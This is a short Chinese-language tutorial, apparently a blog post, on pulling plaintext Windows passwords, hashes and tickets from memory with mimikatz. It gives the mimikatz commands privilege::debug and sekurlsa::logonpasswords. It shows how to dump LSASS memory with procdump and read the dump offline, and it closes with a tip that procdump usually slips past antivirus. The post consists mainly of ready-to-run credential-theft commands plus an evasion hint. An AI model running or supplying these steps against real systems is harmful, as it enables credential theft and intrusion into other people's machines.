利用 mimikatz 获取明文密码

本文最后更新于 2025年7月14日 凌晨

📌 0、简介

mimikatz 可以从 Windows 内存中获取账户明文密码、哈希、PIN、票据等敏感信息。

下载地址:
👉 mimikatz 2.2.0-20200308-1

📌 1、常用命令

1
2
3
4
5
6
7
8
# 开始记录日志
log

# 获取调试权限(必须)
privilege::debug

# 列出当前登录用户凭据
sekurlsa::logonpasswords

📌 2、保存内存转储

Windows 的 LSASS(Local Security Authority Subsystem Service)进程保存了用户凭据,可使用微软官方的 procdump 转储内存:

1
2
# 使用 procdump64.exe 导出 lsass 内存(需管理员权限)
procdump64.exe -accepteula -ma lsass.exe lsass.dmp

📌 3、离线读取转储文件

lsass.dmp 下载到本地后,使用 mimikatz 读取:

1
2
3
4
5
6
7
8
# 指定转储文件
sekurlsa::minidump lsass.dmp

# 启用日志(可选)
log

# 列出凭据
sekurlsa::logonpasswords full

⚠️ 注意

✅ 建议使用管理员权限执行
✅ 转储文件中包含明文密码,请妥善保管
procdump 是 Sysinternals 官方工具,大部分杀软不会阻止